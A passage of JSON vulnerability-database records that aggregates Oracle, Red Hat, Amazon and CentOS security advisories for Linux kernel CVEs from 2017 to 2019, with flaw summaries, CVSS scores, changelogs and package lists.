"http://linux.oracle.com/errata/ELSA-2017-3636.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000380", "CVE-2017-14489", "CVE-2017-9074", "CVE-2017-8831", "CVE-2017-11473", "CVE-2017-9075", "CVE-2017-10661", "CVE-2017-7308", "CVE-2017-1000363", "CVE-2017-9077", "CVE-2016-10044"], "description": "[2.6.39-400.297.12]\n- xsigo: [backport] Fix race in freeing aged Forwarding tables (Pradeep Gopanapalli) [Orabug: 24823234] \n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 25671723] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 25671723] \n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- net/packet: fix overflow in check for tp_frame_nr (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403941] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben Hutchings) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. Miller) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404007] {CVE-2017-9077}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643601] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. Biederman) [Orabug: 26643601] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643601] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643652] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650889] {CVE-2017-9075}\n- saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: get rid of warning: no previous prototype (Mauro Carvalho Chehab) [Orabug: 26675148] {CVE-2017-8831}\n- [scsi] lpfc 8.3.44: Fix kernel panics from corrupted ndlp (James Smart) [Orabug: 26765341] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899791] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988628] {CVE-2017-14489}", "edition": 4, "modified": "2017-11-02T00:00:00", "published": "2017-11-02T00:00:00", "id": "ELSA-2017-3637", "href": "http://linux.oracle.com/errata/ELSA-2017-3637.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12154", "CVE-2017-15129", "CVE-2017-15274", "CVE-2018-14633", "CVE-2018-3693"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions past bounds check. The flaw relies on the presence of a precisely-defined instruction sequence in the privileged code and the fact that memory writes occur to an address which depends on the untrusted value. Such writes cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to influence speculative execution and/or read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3693)\n\n* Kernel: kvm: nVMX: L2 guest could access hardware(L0) CR8 register (CVE-2017-12154)\n\n* kernel: net: double-free and memory corruption in get_net_ns_by_id() (CVE-2017-15129)\n\n* kernel: dereferencing NULL payload with nonzero length (CVE-2017-15274)\n\n* kernel: stack-based buffer overflow in chap_server_compute_md5() in iscsi target (CVE-2018-14633)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* ovl_create can return positive retval and crash the host (BZ#1696290)\n\n* THP: Race between MADV_DONTNEED and NUMA hinting node migration code (BZ#1698105)\n\n* RHEL7.6 - Kernel changes for count cache flush Spectre v2 mitigation (BZ#1708543)\n\n* Poor system performance from thundering herd of kworkers competing for mddev->flush_bio ownership (BZ#1712762)\n\n* [RHEL7.7] RAID1 `write-behind` causes a kernel panic (BZ#1712999)\n\nEnhancement(s):\n\n* [Intel 7.5 FEAT] i40evf - Update to latest upstream driver version (BZ#1722774)\n\n* [netdrv] i40e/i40evf: Fix use after free in Rx cleanup path [7.4.z] (BZ#1723831)\n\nUsers of kernel are advised to upgrade to these updated packages, which fix these bugs and add these enhancements.", "modified": "2019-07-30T12:51:31", "published": "2019-07-30T12:23:10", "id": "RHSA-2019:1946", "href": "https://access.redhat.com/errata/RHSA-2019:1946", "type": "redhat", "title": "(RHSA-2019:1946) Important: kernel security, bug fix, and enhancement update", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-08-13T18:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000252", "CVE-2017-1000410", "CVE-2017-13166", "CVE-2017-15265", "CVE-2017-17449", "CVE-2017-18017", "CVE-2017-8824", "CVE-2017-9725"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824, Important)\n\n* kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation (CVE-2017-13166, Important)\n\n* kernel: Incorrect type conversion for size during dma allocation (CVE-2017-9725, Moderate)\n\n* kernel: Use-after-free in snd_seq_ioctl_create_port() (CVE-2017-15265, Moderate)\n\n* kernel: Missing namespace check in net/netlink/af_netlink.c allows for network monitors to observe systemwide activity (CVE-2017-17449, Moderate)\n\n* kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c (CVE-2017-18017, Moderate)\n\n* kernel: kvm: Reachable BUG() on out-of-bounds guest IRQ (CVE-2017-1000252, Moderate)\n\n* kernel: Stack information leak in the EFS element (CVE-2017-1000410, Moderate)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Mohamed Ghannam for reporting CVE-2017-8824; Jan H. Sch\u00f6nherr (Amazon) for reporting CVE-2017-1000252; and Armis Labs for reporting CVE-2017-1000410.\n\nBug Fix(es):\n\nThese updated kernel packages include also numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. See the bug fix descriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/3411331", "modified": "2018-04-17T19:12:16", "published": "2018-04-17T18:31:22", "id": "RHSA-2018:1130", "href": "https://access.redhat.com/errata/RHSA-2018:1130", "type": "redhat", "title": "(RHSA-2018:1130) Important: kernel security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:37:36", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15274", "CVE-2017-14991", "CVE-2017-1000251", "CVE-2017-12192", "CVE-2017-14340", "CVE-2017-12154"], "description": "**Issue Overview:**\n\nstack buffer overflow in the native Bluetooth stack \nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. ([CVE-2017-1000251 __](<https://access.redhat.com/security/cve/CVE-2017-1000251>))\n\ndereferencing NULL payload with nonzero length \nA flaw was found in the implementation of associative arrays where the add_key systemcall and KEYCTL_UPDATE operations allowed for a NULL payload with a nonzero length. When accessing the payload within this length parameters value, an unprivileged user could trivially cause a NULL pointer dereference (kernel oops). ([CVE-2017-15274 __](<https://access.redhat.com/security/cve/CVE-2017-15274>))\n\nxfs: unprivileged user kernel oops \nA flaw was found where the XFS filesystem code mishandles a user-settable inode flag in the Linux kernel prior to 4.14-rc1. This can cause a local denial of service via a kernel panic.([CVE-2017-14340 __](<https://access.redhat.com/security/cve/CVE-2017-14340>))\n\nInformation leak in the scsi driver \nThe sg_ioctl() function in 'drivers/scsi/sg.c' in the Linux kernel, from version 4.12-rc1 to 4.14-rc2, allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for '/dev/sg0'. ([CVE-2017-14991 __](<https://access.redhat.com/security/cve/CVE-2017-14991>))\n\nkvm: nVMX: L2 guest could access hardware(L0) CR8 register \nLinux kernel built with the KVM visualization support (CONFIG_KVM), with nested visualization (nVMX) feature enabled (nested=1), is vulnerable to a crash due to disabled external interrupts. As L2 guest could access (r/w) hardware CR8 register of the host(L0). In a nested visualization setup, L2 guest user could use this flaw to potentially crash the host(L0) resulting in DoS. ([CVE-2017-12154 __](<https://access.redhat.com/security/cve/CVE-2017-12154>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-headers-4.9.58-18.51.amzn1.i686 \n perf-4.9.58-18.51.amzn1.i686 \n perf-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-4.9.58-18.51.amzn1.i686 \n kernel-devel-4.9.58-18.51.amzn1.i686 \n kernel-tools-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-tools-4.9.58-18.51.amzn1.i686 \n kernel-tools-devel-4.9.58-18.51.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.58-18.51.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.58-18.51.amzn1.noarch \n \n src: \n kernel-4.9.58-18.51.amzn1.src \n \n x86_64: \n kernel-tools-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.58-18.51.amzn1.x86_64 \n kernel-devel-4.9.58-18.51.amzn1.x86_64 \n kernel-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-4.9.58-18.51.amzn1.x86_64 \n perf-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-tools-devel-4.9.58-18.51.amzn1.x86_64 \n kernel-tools-4.9.58-18.51.amzn1.x86_64 \n perf-4.9.58-18.51.amzn1.x86_64 \n kernel-headers-4.9.58-18.51.amzn1.x86_64 \n \n \n", "edition": 6, "modified": "2017-10-26T16:43:00", "published": "2017-10-26T16:43:00", "id": "ALAS-2017-914", "href": "https://alas.aws.amazon.com/ALAS-2017-914.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:27:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5754", "CVE-2017-17558", "CVE-2016-8633", "CVE-2018-1000004", "CVE-2017-15274", "CVE-2017-15265", "CVE-2017-18203", "CVE-2017-1000252", "CVE-2018-6927", "CVE-2017-15129", "CVE-2017-7294", "CVE-2017-14140", "CVE-2017-8824", "CVE-2017-17448", "CVE-2017-13166", "CVE-2017-13305", "CVE-2017-1000407", "CVE-2017-15126", "CVE-2017-15116", "CVE-2017-18270", "CVE-2017-1000410", "CVE-2017-17449", "CVE-2017-9725", "CVE-2016-7913", "CVE-2017-15127", "CVE-2018-5750", "CVE-2017-15121", "CVE-2017-18017", "CVE-2017-12154", "CVE-2016-3672", "CVE-2017-12190"], "description": "**CentOS Errata and Security Advisory** CESA-2018:1062\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* hw: cpu: speculative execution permission faults handling (CVE-2017-5754, Important, KVM for Power)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming packets (CVE-2016-8633, Important)\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824, Important)\n\n* Kernel: kvm: nVMX: L2 guest could access hardware(L0) CR8 register (CVE-2017-12154, Important)\n\n* kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation (CVE-2017-13166, Important)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver (CVE-2016-7913, Moderate)\n\n* kernel: drm/vmwgfx: fix integer overflow in vmw_surface_define_ioctl() (CVE-2017-7294, Moderate)\n\n* kernel: Incorrect type conversion for size during dma allocation (CVE-2017-9725, Moderate)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors (CVE-2017-12190, Moderate)\n\n* kernel: vfs: BUG in truncate_inode_pages_range() and fuse client (CVE-2017-15121, Moderate)\n\n* kernel: Use-after-free in userfaultfd_event_wait_completion function in userfaultfd.c (CVE-2017-15126, Moderate)\n\n* kernel: net: double-free and memory corruption in get_net_ns_by_id() (CVE-2017-15129, Moderate)\n\n* kernel: Use-after-free in snd_seq_ioctl_create_port() (CVE-2017-15265, Moderate)\n\n* kernel: Missing capabilities check in net/netfilter/nfnetlink_cthelper.c allows for unprivileged access to systemwide nfnl_cthelper_list structure (CVE-2017-17448, Moderate)\n\n* kernel: Missing namespace check in net/netlink/af_netlink.c allows for network monitors to observe systemwide activity (CVE-2017-17449, Moderate)\n\n* kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow (CVE-2017-17558, Moderate)\n\n* kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c (CVE-2017-18017, Moderate)\n\n* kernel: Race condition in drivers/md/dm.c:dm_get_from_kobject() allows local users to cause a denial of service (CVE-2017-18203, Moderate)\n\n* kernel: kvm: Reachable BUG() on out-of-bounds guest IRQ (CVE-2017-1000252, Moderate)\n\n* Kernel: KVM: DoS via write flood to I/O port 0x80 (CVE-2017-1000407, Moderate)\n\n* kernel: Stack information leak in the EFS element (CVE-2017-1000410, Moderate)\n\n* kernel: Kernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass (CVE-2018-5750, Moderate)\n\n* kernel: Race condition in sound system can lead to denial of service (CVE-2018-1000004, Moderate)\n\n * kernel: multiple Low security impact security issues (CVE-2016-3672, CVE-2017-14140, CVE-2017-15116, CVE-2017-15127, CVE-2018-6927, Low)\n\nRed Hat would like to thank Eyal Itkin for reporting CVE-2016-8633; Google Project Zero for reporting CVE-2017-5754; Mohamed Ghannam for reporting CVE-2017-8824; Jim Mattson (Google.com) for reporting CVE-2017-12154; Vitaly Mayatskih for reporting CVE-2017-12190; Andrea Arcangeli (Engineering) for reporting CVE-2017-15126; Kirill Tkhai for reporting CVE-2017-15129; Jan H. Sch\u00f6nherr (Amazon) for reporting CVE-2017-1000252; and Armis Labs for reporting CVE-2017-1000410. The CVE-2017-15121 issue was discovered by Miklos Szeredi (Red Hat) and the CVE-2017-15116 issue was discovered by ChunYu Wang (Red Hat).\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.5 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2018-April/005226.html\n\n**Affected packages:**\nkernel-abi-whitelists\nkernel-doc\n\n**Upstream details at:**\n", "edition": 4, "modified": "2018-04-27T05:53:39", "published": "2018-04-27T05:53:39", "id": "CESA-2018:1062", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2018-April/005226.html", "title": "kernel security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}